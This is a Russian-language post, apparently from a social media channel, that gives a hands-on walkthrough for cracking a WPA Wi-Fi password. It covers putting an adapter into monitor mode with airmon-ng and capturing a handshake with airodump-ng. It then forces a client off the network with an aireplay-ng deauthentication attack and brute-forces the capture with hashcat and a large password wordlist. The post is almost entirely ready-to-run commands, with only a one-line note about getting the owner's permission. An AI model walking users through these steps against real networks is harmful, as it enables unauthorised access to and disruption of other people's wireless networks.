Пентест Wi-Fi с aircrack-ng: практика.
• Админ купил премиум на месяц 🥳, теперь некоторые посты будут длиннее.
• ВНИМАНИЕ! Все действия должны производиться только с разрешения владельца!
• Все данные в квадратных скобках замените на свои и уберите квадратные скобки.
• В прошлом посте мы узнали как теоретически можно узнать пароль вайфай, что ж, давайте перейдем к практике.
• Сначала вводим
sudo -i. После чего вас попросят ввести пароль пользователя.• Далее вводим
ifconfig, вам выдаст все адаптеры, нам нужен тот, что называется по типу wlan0.•
airmon-ng check kill эта команда завершит процессы, которые могут помешать.•
airmon-ng start wlan0 запускаем режим монитора. У вас вместо wlan0 будет название вашего адаптера.•
airodump-ng wlan0 вам выдаст список сетей, выберите одну и запишите ее BSSID и CH.•
airodump-ng --bssid [тут BSSID] --channel [тут CH] -w HANDSHAKE wlan0 мы начали слушать эту сеть, ждите, пока снизу не появится хотя бы одно устройство. • У устройства нам понадобится значение STATION.
• Когда устройство появилось, не закрывая консоль откройте новую, после чего пропишите
sudo aireplay-ng --deauth 0 -a [BSSID роутера] -c [STATION] wlan0.• Началась деаутентификация клиента, подождите буквально 10-20 секунд, после чего можете закрыть новую консоль.
• В первой консоли вверху должна появиться строчка WPA handshake, в у устройства в Notes - EAPOL.
• Теперь у вас есть файл хендшейка с расширением .cap.
• Расшифровка пароля.
• Переходим на винду и скачиваем Hashcat. Конвертируем .cap файл *тут*, и скачиваем любой словарь с паролями *тут*, я использую weakpass_wifi_1 на 33 ГБ.
• Перейдите в папку с hashcat и запустите командную сроку, введите
hashcat.exe -m 22000 -w 1 "[сюда полный путь к конвертируемому хендшейку]" "[полный путь до словаря]". Если хотите ускорить процесс, после -w поставьте 2 или 3. Ждите, если все будет успешно, в графе status будет Cracked, а пароль будет в строке Candidates после стрелочки.• Если есть какие-то вопросы или пожелания, пишите в комментарии!
